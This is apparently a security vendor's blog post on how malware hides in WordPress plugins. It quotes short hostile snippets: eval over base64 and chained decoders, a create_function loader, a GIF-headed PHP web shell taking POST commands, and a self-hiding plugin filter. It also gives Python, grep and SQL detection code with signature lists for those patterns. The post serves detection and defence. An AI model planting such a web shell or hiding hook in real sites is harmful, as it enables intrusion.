
How Malware Hides Inside WordPress Plugins

March 22, 2024·WO Security Shield Team

Nulled plugins are an obvious malware vector — everyone knows not to use pirated software. But attackers have become much more sophisticated. Today, malware is regularly found inside:

  • Legitimate plugins with compromised update servers
  • Abandoned plugins that haven't been audited in years
  • Plugins with dependency confusion vulnerabilities

Here's how the obfuscation actually works.

The eval(base64_decode) pattern

The most common PHP malware pattern is dead simple:

<?php eval(base64_decode('cGhwaW5mbygpOw==')); ?>

That base64 string decodes to phpinfo(); in this example — but in a real attack it's hundreds of lines of backdoor code. The eval() executes whatever the decoded string contains.

WO Security Shield flags this as a critical finding regardless of what the base64 decodes to. The pattern itself is the red flag.

Chained encoding

More advanced malware chains multiple obfuscation layers:

eval(str_rot13(base64_decode(gzinflate(base64_decode('...')))));

This stacks ROT-13, base64 and gzinflate compression; PHP unwraps the layers from the innermost call outward, and the result is virtually unreadable without decoding it. For a comprehensive look at these techniques, see WordPress malware obfuscation techniques. WO Security Shield catches every combination of these chained patterns.
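The layers can be peeled off statically, without ever executing the payload. The following is an added example (not WO Security Shield's code): it parses the eval() call chain, applies Python equivalents of the PHP decode functions in reverse order, and includes a constructed fixture builder so the decoder can be exercised on the exact chain shown above.

```python
import base64
import codecs
import re
import zlib

# Static equivalents of the PHP decode layers; the payload is revealed
# without being run. PHP strings are bytes, so latin-1 is used losslessly.
LAYERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),  # gzinflate is raw DEFLATE
    "gzuncompress": zlib.decompress,                 # gzuncompress is zlib-wrapped
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
}

# Matches eval( fn1( fn2( ... 'literal' ) ) ); capturing the chain and the literal.
CHAIN_RE = re.compile(r"eval\s*\(\s*((?:\w+\s*\(\s*)+)'([^']*)'\s*\)+\s*;?")

def unwrap_eval_chain(src):
    """Peel every decode layer off the first eval chain found in src.

    Returns (layer_names_outer_to_inner, decoded_payload), or None when no
    eval chain is present. An unknown layer raises ValueError so a scanner
    can still flag the file as obfuscated but undecodable.
    """
    m = CHAIN_RE.search(src)
    if not m:
        return None
    layers = re.findall(r"\w+", m.group(1))
    data = m.group(2).encode("latin-1")
    for fn in reversed(layers):  # PHP evaluates the innermost call first
        if fn not in LAYERS:
            raise ValueError(f"unsupported layer: {fn}")
        data = LAYERS[fn](data)
    return layers, data.decode("latin-1")

def build_chained_sample(code):
    """Constructed test fixture: wrap code in the chain quoted in the post."""
    step = codecs.encode(code, "rot13").encode("latin-1")
    step = base64.b64encode(step)
    deflater = zlib.compressobj(9, zlib.DEFLATED, -15)
    step = base64.b64encode(deflater.compress(step) + deflater.flush()).decode()
    return f"<?php eval(str_rot13(base64_decode(gzinflate(base64_decode('{step}'))))); ?>"
```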

The create_function trick

Before it was deprecated in PHP 7.2, create_function was widely used to create anonymous functions from dynamically constructed strings:

$f = create_function('', base64_decode($payload));
$f();

Even though create_function was removed in PHP 8, servers still running older PHP versions will execute this pattern without complaint.

Hiding in image files

Some malware embeds PHP in what appear to be image files:

GIF89a<?php eval($_POST['cmd']); ?>

When uploaded as a .gif file, Apache or Nginx may execute it as PHP if misconfigured. WO Security Shield's uploads scanner specifically looks for executable code in the uploads directory.

The self-hiding plugin

The most insidious variant hooks into WordPress itself to hide its own presence:

add_filter('all_plugins', function($plugins) {
    unset($plugins[plugin_basename(__FILE__)]);
    return $plugins;
});

This makes the malicious plugin invisible in the WordPress admin panel. You'll never see it in Plugins → Installed Plugins. WO Security Shield detects this pattern and flags it as critical because no legitimate plugin should ever hide itself.

How WO Security Shield finds it all

WO Security Shield uses three independent detection layers:

  1. Signature matching — 70+ regex patterns covering every known obfuscation technique
  2. Behavioral scoring — weighted scoring system that catches novel obfuscation even without a matching signature
  3. File integrity baseline — any file that changes between scans triggers an alert, regardless of content

This multi-layer approach means that zero-day malware using previously unseen obfuscation can slip past the signature scanner and still be caught by the behavioral scorer.
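To make the signature and behavioral layers concrete, here is an added example (not WO Security Shield's scanner) that scores a PHP source string: weighted signatures cover the eval(base64_decode), create_function, image-header, request-input and self-hiding patterns described above, and an entropy rule flags long encoded literals whatever encoder produced them. The weights, thresholds and sample snippets are constructed for illustration.

```python
import math
import re

# Signature layer: patterns for the techniques described in the post, each
# weighted. Behavioural layer (below): properties of the code itself.
SIGNATURES = [
    (r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", 60, "eval over a decode function"),
    (r"create_function\s*\(\s*'[^']*'\s*,\s*base64_decode\s*\(", 60, "create_function body from base64"),
    (r"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", 80, "eval of raw request input"),
    (r"\AGIF89a.{0,64}<\?php", 70, "PHP code behind a GIF header"),
    (r"add_filter\s*\(\s*['\"]all_plugins['\"]", 50, "removes itself from the plugin list"),
]
CRITICAL, SUSPICIOUS = 50, 25  # constructed thresholds

def shannon_entropy(text):
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())

def score_php(src):
    """Return (score, reasons) for one PHP source string."""
    score, reasons = 0, []
    for pattern, weight, why in SIGNATURES:
        if re.search(pattern, src, re.S):
            score += weight
            reasons.append(why)
    # Behavioural rule: a long, high-entropy string literal is what an encoded
    # payload looks like regardless of encoder, so no signature is needed.
    for literal in re.findall(r"'([^'\n]{200,})'", src):
        if shannon_entropy(literal) > 4.5:
            score += 30
            reasons.append(f"high-entropy literal ({len(literal)} chars)")
            break
    return score, reasons

def verdict(score):
    return "critical" if score >= CRITICAL else "suspicious" if score >= SUSPICIOUS else "clean"

# Constructed samples: the post's eval pattern, its self-hiding hook, and a
# benign plugin that legitimately builds a base64 data URI for an icon.
SAMPLES = {
    "eval": "<?php eval(base64_decode('cGhwaW5mbygpOw==')); ?>",
    "hidden": "<?php add_filter('all_plugins', function($plugins) {\n"
              "    unset($plugins[plugin_basename(__FILE__)]);\n    return $plugins;\n}); ?>",
    "benign": "<?php $icon = 'data:image/png;base64,' . base64_encode(file_get_contents(__DIR__ . '/icon.png')); ?>",
}
```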

Start your free trial at wosecurity.com.

Detection Techniques: How to Find Hidden Malware

Knowing how malware hides is only useful if you know how to find it. Here are practical detection methods for each hiding technique:

Detecting Encoded Payloads

Search your plugin files for common encoding functions used maliciously:

# Find base64 + eval combinations
grep -r "eval(base64_decode" wp-content/plugins/

# Find gzinflate chains
grep -r "gzinflate(base64_decode" wp-content/plugins/

# Find hex-encoded strings being evaluated (single quotes so grep receives a literal backslash)
grep -r '\\x[0-9a-fA-F]\{2\}' wp-content/plugins/ --include="*.php" | grep -i eval

Not every match is malicious — some legitimate plugins use base64 for encoding assets. But eval(base64_decode()) is a red flag 95% of the time.

Detecting File Timestamp Manipulation

Malware often backdates its files to blend in:

# Find PHP files whose modification time is newer than a reference file you know is untouched
find wp-content/plugins -name "*.php" -newer wp-content/plugins/index.php

# List each plugin directory's modification time to compare against when you installed it
stat -c "%y %n" wp-content/plugins/*/

WO Security Shield's file integrity monitoring catches this automatically — it tracks actual file content hashes, not timestamps.
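A content-hash baseline is what makes backdating useless. The following is an added example (not WO Security Shield's implementation): it snapshots SHA-256 digests of a plugin tree, diffs two snapshots, and in a constructed scenario alters a file, restores its original mtime, and drops a new file to show that both changes are still reported.

```python
import hashlib
import os
import tempfile

def snapshot(root):
    """Map each file under root (posix-style relative path) to the SHA-256 of its content."""
    baseline = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            baseline[os.path.relpath(full, root).replace(os.sep, "/")] = digest
    return baseline

def diff_snapshots(old, new):
    """Return (added, removed, modified) paths; timestamps play no part."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    modified = sorted(p for p in set(old) & set(new) if old[p] != new[p])
    return added, removed, modified

def demo():
    """Constructed scenario: a plugin file is tampered with and its mtime restored."""
    with tempfile.TemporaryDirectory() as root:
        plugin = os.path.join(root, "example-plugin")
        os.makedirs(plugin)
        target = os.path.join(plugin, "example-plugin.php")
        with open(target, "w") as fh:
            fh.write("<?php // Plugin Name: Example\n")
        before = snapshot(root)
        st = os.stat(target)
        with open(target, "a") as fh:
            fh.write("eval(base64_decode('cGhwaW5mbygpOw=='));\n")  # the post's sample payload
        os.utime(target, ns=(st.st_atime_ns, st.st_mtime_ns))  # backdate to the original mtime
        with open(os.path.join(plugin, "cache.php"), "w") as fh:
            fh.write("<?php // dropped file\n")
        after = snapshot(root)
        return diff_snapshots(before, after)
```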

Detecting Database-Stored Malware

Check for code stored in WordPress options or post meta:

-- Find options containing PHP code indicators (table prefix assumed to be wp_; adjust for your site)
SELECT option_name, LEFT(option_value, 200)
FROM wp_options
WHERE option_value LIKE '%eval(%'
   OR option_value LIKE '%base64_decode(%'
   OR option_value LIKE '%<?php%';

-- Check for suspicious widgets
SELECT option_value FROM wp_options
WHERE option_name = 'widget_text'
AND option_value LIKE '%<script%';

Detecting Backdoor Accounts

-- Find admin accounts created after your site launch
SELECT user_login, user_email, user_registered
FROM wp_users
JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'
ORDER BY user_registered DESC;

Any admin account you don't recognise should be investigated immediately.

Prevention: Keeping Malware Out of Your Plugins

Vetting plugins before installation

  1. Check the plugin's WordPress.org page — look at last update date, number of active installations, and support forum activity
  2. Review the changelog — regular security patches indicate active maintenance
  3. Search for CVEs — check wpscan.com and nvd.nist.gov for known vulnerabilities
  4. Never use nulled plugins — they're the #1 source of pre-installed backdoors

Ongoing monitoring

  • File integrity scanning — detect changes to plugin files immediately
  • Regular plugin audits — remove plugins you no longer use
  • Auto-updates for security patches — don't wait for manual review on security fixes
  • Activity logging — track when plugins are installed, activated, or modified

When a plugin is compromised

If a legitimate plugin you use gets compromised (supply chain attack):

  1. Deactivate and delete the plugin immediately
  2. Scan your entire site for backdoors the compromised version may have installed
  3. Check if the plugin has released a security update
  4. Monitor WordPress.org and security advisories for official guidance
  5. Review your activity log for any actions taken while the compromised version was active

The WordPress plugin ecosystem's openness is both its greatest strength and its biggest security challenge. The combination of careful plugin selection, ongoing monitoring, and a security plugin that watches for file changes gives you the best defence.
